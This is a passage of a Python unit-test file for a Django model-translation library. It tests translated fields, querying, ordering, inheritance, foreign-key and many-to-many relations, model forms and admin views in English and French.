Foo.objects.exclude(name__startswith="English") self.assertEquals(qs.count(), 0) translation.activate('fr') qs = Foo.objects.filter(name="French Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name__startswith="French") self.assertEquals(qs.count(), 0) def testFilteringUsingExplicitFieldName(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=20) obj2.translate(name='Another French Foo', language='fr') obj2.save() # we're in english qs = Foo.objects.filter(name_en="English Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) # try using the french field 
name qs = Foo.objects.filter(name_fr="French Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) # now try in french translation.activate('fr') qs = Foo.objects.filter(name_en="English Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) # try using the french field name qs = Foo.objects.filter(name_fr="French Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) def testOrderingOnTransField(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() qs = Foo.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) translation.activate('fr') qs = Foo.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) self.assertEquals(qs[1].name, 'French Foo') def testDefaultOrderingIsTransField(self): """ Test a model that has a trans field in the default ordering. 
""" f1 = FooCategory.objects.create(name='B2 foo') f1.translate(name='B2 foo', language='fr') f1.save() f2 = FooCategory.objects.create(name='A1 foo') f2.translate(name='C3 foo', language='fr') f2.save() f3 = FooCategory.objects.create(name='C3 foo') f3.translate(name='A1 foo', language='fr') f3.save() qs_en = FooCategory.objects.all() self.assertEquals(qs_en[0], f2) self.assertEquals(qs_en[1], f1) self.assertEquals(qs_en[2], f3) translation.activate('fr') qs_fr = FooCategory.objects.all() self.assertEquals(qs_fr[0], f3) self.assertEquals(qs_fr[1], f1) self.assertEquals(qs_fr[2], f2) def testFilteringOnRelatedObjectsTransField(self): # Test filtering on related object's translatable field obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() m1 = FooRel.objects.create(myfoo=obj, desc="description 1") m2 = FooRel.objects.create(myfoo=obj2, desc="description 2") qs = FooRel.objects.filter(myfoo__name='Another English Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = FooRel.objects.filter(myfoo__name__startswith='English') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) translation.activate('fr') qs = FooRel.objects.filter(myfoo__name='Another French Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = FooRel.objects.filter(myfoo__name__startswith='French') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) def testFilteringOnRelatedObjectsUsingExplicitFieldName(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=20) obj2.translate(name='Another French Foo', language='fr') obj2.save() m1 = FooRel.objects.create(myfoo=obj, desc="description 1") m2 = FooRel.objects.create(myfoo=obj2, desc="description 2") # we're in english translation.activate('en') qs = FooRel.objects.filter(myfoo__name_en='English Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_en__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) # try using the french field name qs = FooRel.objects.filter(myfoo__name_fr='French Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_fr__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) # now try in french translation.activate('fr') qs = FooRel.objects.filter(myfoo__name_en='English Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_en__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) # try using the french field name qs = FooRel.objects.filter(myfoo__name_fr='French Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_fr__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) def testModelWithTranslatableFileField(self): doc = Doc.objects.create(pdf='something.pdf') doc.translate(pdf='something-fr.pdf', language='fr') doc.save() translation.activate('en') self.assertEqual(Doc.objects.get().pdf.url, 'something.pdf') translation.activate('fr') self.assertEqual(Doc.objects.get().pdf.url, 'something-fr.pdf') def 
testModelWithAFieldCalledLanguageThatIsNotTranslatable(self): lan = Lan.objects.create(name='Test en', language='en') lan.translate(name='Test fr', language='fr') lan.save() translation.activate('en') self.assertEqual(Lan.objects.get().name, 'Test en') self.assertEqual(Lan.objects.get().language, 'en') translation.activate('fr') self.assertEqual(Lan.objects.get().name, 'Test fr') self.assertEqual(Lan.objects.get().language, 'en') class InheritanceTests(LinguoTests): def testOrderingOfFieldsWithinModel(self): expected = ['id', 'price', 'name', 'name_fr', 'foo_ptr', 'quantity', 'description', 'description_fr'] for i in range(len(Bar._meta.fields)): self.assertEqual(Bar._meta.fields[i].name, expected[i]) def testCreation(self): translation.activate('en') obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj = Bar.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'test') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) translation.activate('fr') Bar.objects.create(name='FrenchBar', description='test in french', price=7, quantity=5) translation.activate('en') self.assertEquals(Bar.objects.count(), 2) def testTranslate(self): """ We should be able to create a translation of an object. """ obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') obj.save() # Refresh from db obj = Bar.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'test') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.description, 'test FR') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) def testDelayedCreation(self): obj = Bar() obj.name = 'Bar' obj.description = 'Some desc' obj.price = 9 obj.quantity = 2 translation.activate('fr') obj.name = 'BarFr' obj.description = 'Some desc fr' obj.save() translation.activate('en') obj = Bar.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'Some desc') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.description, 'Some desc fr') self.assertEquals(obj.price, 9) self.assertEquals(obj.quantity, 2) def testSwitchingActiveLanguageSetValuesOnTranslatedFields(self): obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') translation.activate('fr') self.assertEquals(obj.name, 'BarFr') obj.name = 'NewBarFr' translation.activate('en') self.assertEquals(obj.name, 'Bar') obj.save() # Refresh from db obj = Foo.objects.get(id=obj.id) self.assertEquals(obj.name, 'Bar') translation.activate('fr') self.assertEquals(obj.name, 'NewBarFr') def testCreateTranslationWithNewValueForNonTransField(self): """ That value of non-trans fields should be the same for all translations. 
""" obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', price=20, quantity=40, language='fr') translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.description, 'test FR') self.assertEquals(obj.price, 20) self.assertEquals(obj.quantity, 40) translation.activate('en') self.assertEquals(obj.price, 20) self.assertEquals(obj.quantity, 40) # Ensure no other fields were changed self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.description, 'test') def testQuerysetUpdate(self): obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') obj.save() obj2 = Bar.objects.create(name='Bar2', description='bar desc', price=13, quantity=5) obj2.translate(name='Bar2Fr', description='test2 FR', language='fr') obj2.save() qs = Bar.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewBar', quantity=99) # Refresh objects from db obj = Bar.objects.get(pk=obj.pk) obj2 = Bar.objects.get(pk=obj2.pk) self.assertEquals(obj.name, 'NewBar') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'NewBar') self.assertEquals(obj2.quantity, 99) translation.activate('fr') self.assertEquals(obj.name, 'BarFr') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'Bar2Fr') self.assertEquals(obj2.quantity, 99) def testQuerysetUpdateInOtherLanguageSetsValuesOnOtherLanguageOnly(self): obj = Bar.objects.create(name='Bar', description='test', price=9, quantity=2) obj.translate(name='BarFr', description='test FR', language='fr') obj.save() obj2 = Bar.objects.create(name='Bar2', description='bar desc', price=13, quantity=5) obj2.translate(name='Bar2Fr', description='test2 FR', language='fr') obj2.save() translation.activate('fr') qs = Bar.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewBarFr', quantity=99) # Refresh objects from db obj = Bar.objects.get(pk=obj.pk) obj2 = Bar.objects.get(pk=obj2.pk) self.assertEquals(obj.name, 'NewBarFr') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'NewBarFr') self.assertEquals(obj2.quantity, 99) translation.activate('en') self.assertEquals(obj.name, 'Bar') self.assertEquals(obj.quantity, 99) self.assertEquals(obj2.name, 'Bar2') self.assertEquals(obj2.quantity, 99) def testUniqueTogether(self): """ Ensure that the unique_together definitions in child is working. """ Moo.objects.create(name='Moo', price=3, q1=4) try: Moo.objects.create(name='Moo2', price=15, q1=4) except IntegrityError: pass else: self.fail() def testUniqueTogetherInParent(self): """ Ensure that the unique_together definitions in parent is working. 
""" Moo.objects.create(name='Moo', price=3, q1=4) try: Moo.objects.create(name='Moo', price=3, q1=88) except IntegrityError: pass else: self.fail() def testFilteringOnTransField(self): obj = Bar.objects.create(name='English Bar', description='English test', price=9, quantity=2) obj.translate(name='French Bar', description='French test', language='fr') obj.save() qs = Bar.objects.filter(name="English Bar") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.filter(name__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.exclude(name__startswith="English") self.assertEquals(qs.count(), 0) translation.activate('fr') qs = Bar.objects.filter(name="French Bar") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.filter(name__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Bar.objects.exclude(name__startswith="French") self.assertEquals(qs.count(), 0) def testOrderingOnTransField(self): obj = Bar.objects.create(name='English Bar', description='English test', price=9, quantity=2) obj.translate(name='French Bar', description='French test', language='fr') obj.save() obj2 = Bar.objects.create(name='Another English Bar', description='another english test', price=22, quantity=25) obj2.translate(name='Another French Bar', description='another french test', language='fr') obj2.save() qs = Bar.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) translation.activate('fr') qs = Bar.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) self.assertEquals(qs[1].name, 'French Bar') def testDefaultOrderingIsTransAndInheritedTransField(self): """ Test a model that has an inherited trans field in the default ordering. 
""" o1 = Ord.objects.create(name='B2 test', price=1) o1.translate(name='B2 test F', price=1, language='fr') o1.save() o2 = Ord.objects.create(name='A1 test', price=2, last_name='Appleseed') o2.translate(name='C3 test F', price=2, last_name='Charlie', language='fr') o2.save() o2b = Ord.objects.create(name='A1 test', price=3, last_name='Zoltan') o2b.translate(name='C3 test F', price=3, last_name='Bobby', language='fr') o2b.save() o3 = Ord.objects.create(name='C3 foo', price=4) o3.translate(name='A1 test F', price=4, language='fr') o3.save() qs_en = Ord.objects.all() self.assertEquals(qs_en[0], o2) self.assertEquals(qs_en[1], o2b) self.assertEquals(qs_en[2], o1) self.assertEquals(qs_en[3], o3) translation.activate('fr') qs_fr = Ord.objects.all() self.assertEquals(qs_fr[0], o3) self.assertEquals(qs_fr[1], o1) self.assertEquals(qs_fr[2], o2b) self.assertEquals(qs_fr[3], o2) def testFilteringOnRelatedObjectsTransField(self): obj = Bar.objects.create(name='English Bar', description='English test', price=9, quantity=2) obj.translate(name='French Bar', description='French test', language='fr') obj.save() obj2 = Bar.objects.create(name='Another English Bar', description='another english test', price=22, quantity=25) obj2.translate(name='Another French Bar', description='another french test', language='fr') obj2.save() m1 = BarRel.objects.create(mybar=obj, desc="description 1") m2 = BarRel.objects.create(mybar=obj2, desc="description 2") qs = BarRel.objects.filter(mybar__name='Another English Bar') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = BarRel.objects.filter(mybar__name__startswith='English') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) translation.activate('fr') qs = BarRel.objects.filter(mybar__name='Another French Bar') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = BarRel.objects.filter(mybar__name__startswith='French') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) def testExtendingAbstract(self): """ Test a model that extends an abstract model an defines a new non trans field. """ obj = Moe.objects.create(name='test', description='test description', price=5, quantity=3 ) obj.translate(language='fr', name='test-fr', description='test description fr' ) obj.save() obj = Moe.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'test') self.assertEquals(obj.description, 'test description') self.assertEquals(obj.price, 5) self.assertEquals(obj.quantity, 3) Moe.objects.create(name='Other', description='test other', price=15, quantity=13) self.assertEquals(Moe.objects.count(), 2) translation.activate('fr') self.assertEquals(obj.name, 'test-fr') self.assertEquals(obj.description, 'test description fr') self.assertEquals(obj.price, 5) self.assertEquals(obj.quantity, 3) def testExtendingAbstractKeepsNonTransFields(self): obj = Moe.objects.create( name='test', description='test description', price=5, quantity=3 ) obj.translate(language='fr', name='test-fr', description='test description fr', price=13 # Changing price ) obj.quantity = 99 # Changing quantity obj.save() obj = Moe.objects.get(pk=obj.pk) self.assertEquals(obj.price, 13) self.assertEquals(obj.quantity, 99) obj.price = 66 obj.quantity = 77 obj.save() translation.activate('fr') self.assertEquals(obj.price, 66) self.assertEquals(obj.quantity, 77) class ForeignKeyTests(LinguoTests): def testModelWithFK(self): """ A trans model has a foreign key to another trans model. The foreign key is not language specific. 
""" obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') rel1.save() rel2 = Gem.objects.create(somefoo=obj2, gemtype='a') self.assertEquals(rel1.somefoo, obj) # Ensure the reverse manager returns expected results self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) translation.activate('fr') self.assertEquals(rel1.somefoo, obj) self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) translation.activate('en') self.assertEquals(rel2.somefoo, obj2) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel2) def testChangeFKWithInTranslatedLanguage(self): obj = Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') rel1.save() translation.activate('fr') rel1.somefoo = obj2 rel1.save() translation.activate('en') rel2 = Gem.objects.create(somefoo=obj2, gemtype='a') rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj2) self.assertEquals(rel2.somefoo, obj2) self.assertEquals(obj2.gem_set.count(), 2) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) self.assertEquals(obj2.gem_set.order_by('id')[1], rel2) translation.activate('fr') self.assertEquals(obj2.gem_set.count(), 2) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) self.assertEquals(obj2.gem_set.order_by('id')[1], rel2) self.assertEquals(obj.gem_set.count(), 0) def testRemoveFk(self): """ Test for consistency when you remove a foreign key connection. """ obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj2 = Foo.objects.create(name='Another English Foo', price=12) rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') rel1.somefoo = None rel1.save() rel2 = Gem.objects.create(somefoo=obj2, gemtype='a') translation.activate('fr') self.assertEquals(rel1.somefoo, None) self.assertEquals(rel2.somefoo, obj2) self.assertEquals(obj.gem_set.count(), 0) self.assertEquals(obj2.gem_set.count(), 1) def testFKReverseCreation(self): """ Test creating an object using the reverse manager. """ Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = obj2.gem_set.create(gemtype='a') obj2 = Foo.objects.get(pk=obj2.pk) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) translation.activate('fr') self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.order_by('id')[0], rel1) def testFKReverseAddition(self): """ Test adding an object using the reverse manager. 
""" obj = Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') obj2.gem_set.add(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj2) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel1) def testFKReverseRemoval(self): """ Test removing an object using the reverse manager. """ obj = Foo.objects.create(name='English Foo', price=10) obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() rel1 = Gem.objects.create(somefoo=obj, gemtype='a') rel1.translate(gemtype='b', language='fr') obj2.gem_set.add(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj2) self.assertEquals(obj.gem_set.count(), 0) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel1) translation.activate('fr') self.assertEquals(rel1.somefoo, obj2) self.assertEquals(obj.gem_set.count(), 0) self.assertEquals(obj2.gem_set.count(), 1) self.assertEquals(obj2.gem_set.all()[0], rel1) translation.activate('en') obj2.gem_set.remove(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, None) self.assertEquals(obj2.gem_set.count(), 0) translation.activate('fr') self.assertEquals(rel1.somefoo, None) self.assertEquals(obj2.gem_set.count(), 0) def testSetFKInTranslatedLanguage(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() translation.activate('fr') rel1 = Gem.objects.create(gemtype='a', somefoo=obj) translation.activate('en') self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) def testFKReverseAdditionOnTranslatedLanguage(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() rel1 = Gem.objects.create(gemtype='a') translation.activate('fr') obj.gem_set.add(rel1) rel1 = Gem.objects.get(pk=rel1.pk) self.assertEquals(rel1.somefoo, obj) self.assertEquals(obj.gem_set.count(), 1) self.assertEquals(obj.gem_set.all()[0], rel1) class ManyToManyTests(LinguoTests): def testCreateM2M(self): obj = Foo.objects.create(name='English Foo', price=10) cat = obj.categories.create(name='C1') cat2 = FooCategory.objects.create(name='C2') self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat) obj.translate(language='fr', name='French Foo') obj.save() translation.activate('fr') self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat) # Reverse lookup should return only foo self.assertEquals(cat.foo_set.count(), 1) self.assertEquals(cat.foo_set.all()[0], obj) translation.activate('en') cat.translate(language='fr', name='C1 fr') cat.save() translation.activate('fr') self.assertEquals(cat.foo_set.all()[0], obj) translation.activate('en') obj2 = Foo.objects.create(name='Another Foo', price=5) self.assertEquals(obj2.categories.count(), 0) self.assertEquals(cat.foo_set.count(), 1) self.assertEquals(cat.foo_set.all()[0], obj) self.assertEquals(cat2.foo_set.count(), 0) def testRemovingM2M(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(language='fr', name='French Foo') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) cat = obj.categories.create(name='C1') cat2 = 
obj2.categories.create(name='C2') translation.activate('fr') cat3 = obj.categories.create(name='C3') translation.activate('en') self.assertEquals(obj.categories.count(), 2) translation.activate('fr') self.assertEquals(obj.categories.count(), 2) obj.categories.remove(cat) self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat3) translation.activate('en') self.assertEquals(obj.categories.count(), 1) self.assertEquals(obj.categories.all()[0], cat3) self.assertEquals(obj2.categories.count(), 1) self.assertEquals(obj2.categories.all()[0], cat2) self.assertEquals(cat2.foo_set.all()[0], obj2) def testClearingM2M(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(language='fr', name='French Foo') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.save() obj.categories.create(name='C1') cat2 = obj2.categories.create(name='C2') translation.activate('fr') obj.categories.create(name='C3') self.assertEquals(obj.categories.count(), 2) translation.activate('fr') self.assertEquals(obj.categories.count(), 2) obj.categories.clear() self.assertEquals(obj.categories.count(), 0) translation.activate('en') self.assertEquals(obj.categories.count(), 0) self.assertEquals(obj2.categories.count(), 1) self.assertEquals(obj2.categories.all()[0], cat2) self.assertEquals(cat2.foo_set.all()[0], obj2) class FormTests(LinguoTests): def testModelForm(self): form = BarForm() self.assertEqual(len(form.fields), 7) self.assertTrue('name' in form.fields) self.assertTrue('name_fr' in form.fields) self.assertTrue('price' in form.fields) self.assertTrue('categories' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) self.assertTrue('description_fr' in form.fields) data = {'name': 'Test', 'name_fr': 'French Test', 'price': 13, 'quantity': 3, 'description': 'This is a test', 'description_fr': 'French Description', } form = BarForm(data=data) self.assertEqual(unicode(form['name'].label), u'Name') self.assertEqual(unicode(form['name_fr'].label), u'Name (French)') self.assertEqual(unicode(form['description'].label), u'Description') self.assertEqual(unicode(form['description_fr'].label), u'Description (French)') bar = form.save() self.assertEqual(bar.name, 'Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'This is a test') translation.activate('fr') self.assertEqual(bar.name, 'French Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'French Description') translation.activate('en') # Create the form with an instance data2 = {'name': 'Changed', 'name_fr': 'Changed French', 'price': 43, 'quantity': 22, 'description': 'Changed description', 'description_fr': 'Changed description French' } form = BarForm(instance=bar, data=data2) bar = form.save() self.assertEqual(bar.name, 'Changed') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description') translation.activate('fr') self.assertEqual(bar.name, 'Changed French') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description French') def testModelFormInSecondaryLanguage(self): translation.activate('fr') form = BarForm() # When we are in French name and description point to French fields (not the English) # name_fr and description_fr are actually redundant # But we want name_fr and description_fr to take precedence 
over name and description data = {'name': 'Test', 'name_fr': 'French Test', 'price': 13, 'quantity': 3, 'description': 'This is a test', 'description_fr': 'French Description', } form = BarForm(data=data) # These translations are not meant to be correct it is solely for the purpose of testing self.assertEqual(unicode(form['name'].label), u'Neom') self.assertEqual(unicode(form['name_fr'].label), u'Neom (Français)') self.assertEqual(unicode(form['description'].label), u'Description') # This does not get translated because Django generates the verbose_name as a string self.assertEqual(unicode(form['description_fr'].label), u'Déscriptione (Français)') bar = form.save() translation.activate('en') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, '') translation.activate('fr') self.assertEqual(bar.name, 'French Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'French Description') def testModelFormWithFieldsSpecified(self): form = BarFormWithFieldsSpecified() self.assertEqual(len(form.fields), 4) self.assertTrue('name' in form.fields) self.assertTrue('price' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) data = {'name': 'Test', 'price': 13, 'quantity': 3, 'description': 'This is a test', } form = BarFormWithFieldsSpecified(data=data) bar = form.save() self.assertEqual(bar.name, 'Test') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'This is a test') translation.activate('fr') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, '') translation.activate('en') # Create the form with an instance data2 = {'name': 'Changed', 'price': 43, 'quantity': 22, 'description': 'Changed description', } form = BarFormWithFieldsSpecified(instance=bar, data=data2) bar = form.save() self.assertEqual(bar.name, 'Changed') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description') translation.activate('fr') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, '') def testModelFormWithFieldsSpecifiedInSecondaryLanguage(self): translation.activate('fr') form = BarFormWithFieldsSpecified() self.assertEqual(len(form.fields), 4) self.assertTrue('name' in form.fields) self.assertTrue('price' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) data = {'name': '', 'price': 13, 'quantity': 3, 'description': 'This is a French test', } form = BarFormWithFieldsSpecified(data=data) bar = form.save() self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, 'This is a French test') translation.activate('en') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 13) self.assertEqual(bar.quantity, 3) self.assertEqual(bar.description, '') translation.activate('fr') # Create the form with an instance data2 = {'name': 'Changed', 'price': 43, 'quantity': 22, 'description': 'Changed description', } form = BarFormWithFieldsSpecified(instance=bar, data=data2) bar = form.save() self.assertEqual(bar.name, 'Changed') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, 'Changed description') 
translation.activate('en') self.assertEqual(bar.name, '') self.assertEqual(bar.price, 43) self.assertEqual(bar.quantity, 22) self.assertEqual(bar.description, '') if django.VERSION[:3] >= (1, 1, 2): # The AdminTests only pass with django >= 1.1.2 (but compatibility is django >= 1.0.3) class AdminTests(LinguoTests): def setUp(self): super(AdminTests, self).setUp() self.user = User.objects.create_user(username='test', password='', email='' ) self.user.is_staff = True self.user.is_superuser = True self.user.save() self.client.login(username='test', password='') def testAdminChangelistFeatures(self): # Create some Bar objects b1 = Bar.objects.create(name="apple", price=2, description="hello world", quantity=1) b1.translate(name="pomme", description="allo monde", language="fr") b1.save() b2 = Bar.objects.create(name="computer", price=3, description="oh my god", quantity=3) b2.translate(name="ordinator", description="oh mon dieu", language="fr") b2.save() url = reverse('admin:tests_bar_changelist') response = self.client.get(url) # Check that the correct language is being displayed self.assertContains(response, 'hello world') self.assertContains(response, 'oh my god') # Check the list filters self.assertContains(response, '?name=apple') self.assertContains(response, '?name=computer') # Check that the filtering works response = self.client.get(url, {'name': 'computer'}) self.assertContains(response, 'oh my god') self.assertNotContains(response, 'hello world') # Check the searching response = self.client.get(url, {'q': 'world'}) self.assertContains(response, 'hello world') self.assertNotContains(response, 'oh my god') def testAdminAddSubmission(self): url = reverse('admin:tests_bar_add') response = self.client.post(url, data={ 'name': 'Bar', 'name_fr': 'French Bar', 'price': 12, 'quantity': 5, 'description': 'English description.', 'description_fr': 'French description.' }) self.assertEqual(response.status_code, 302) def testAdminChangeSubmission(self): obj = Bar(name='Bar', price=12, quantity=5, description='Hello') obj.translate(language='fr', name='French Bar', description='French Hello') obj.save() url = reverse('admin:tests_bar_change', args=[obj.id]) response = self.client.post(url, data={ 'name': 'Bar2', 'name_fr': 'French Bar2', 'price': 222, 'quantity': 55, 'description': 'Hello2', 'description_fr': 'French Hello2' }) self.assertEqual(response.status_code, 302) class 